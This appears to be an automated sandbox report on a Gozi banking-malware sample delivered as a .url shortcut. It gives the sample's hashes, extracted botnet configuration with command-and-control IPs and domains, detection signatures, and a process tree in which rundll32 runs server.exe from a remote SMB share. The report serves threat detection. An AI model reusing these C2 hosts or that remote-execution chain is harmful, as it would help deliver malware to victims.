Analysis
-
max time kernel
142s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system -
submitted
08/03/2023, 09:08
Static task
static1
Behavioral task
behavioral1
Sample
impresa/impresa.url
Resource
win7-20230220-en
1 signatures
150 seconds
General
-
Target
impresa/impresa.url
-
Size
191B
-
MD5
361301f6ad56d5f44ed70afcbf223df0
-
SHA1
1195b135d96ee1214531ba0c6146318f2524bea8
-
SHA256
2362e52e347d77a6b101b80057d9770e44a44599889385a83822625901631583
-
SHA512
394a2f7d97b7bd70e5827f0294deaee00a710fe931fad8a964ca6f694997de61a3dbd3f63e57a2f119733ea2150c5b1379a4f92b0d871f9714317cc67d9c8284
Malware Config
Extracted
Family
gozi
Botnet
7711
C2
checklist.skype.com
62.173.138.6
89.117.37.146
46.8.210.82
89.116.227.15
31.41.44.51
Attributes
-
base_path
/drew/
-
build
250255
-
exe_type
loader
-
extension
.jlk
-
server_id
50
rsa_pubkey.plain
aes.plain
Extracted
Family
gozi
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Control Panel\International\Geo\Nation rundll32.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 3464 wrote to memory of 5048 3464 rundll32.exe 87 PID 3464 wrote to memory of 5048 3464 rundll32.exe 87 PID 3464 wrote to memory of 5048 3464 rundll32.exe 87
Processes
-
C:\Windows\System32\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Windows\System32\ieframe.dll",OpenURL C:\Users\Admin\AppData\Local\Temp\impresa\impresa.url1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3464 -
\??\UNC\46.8.210.31\Agenzia\server.exe"\\46.8.210.31\Agenzia\server.exe"2⤵PID:5048
-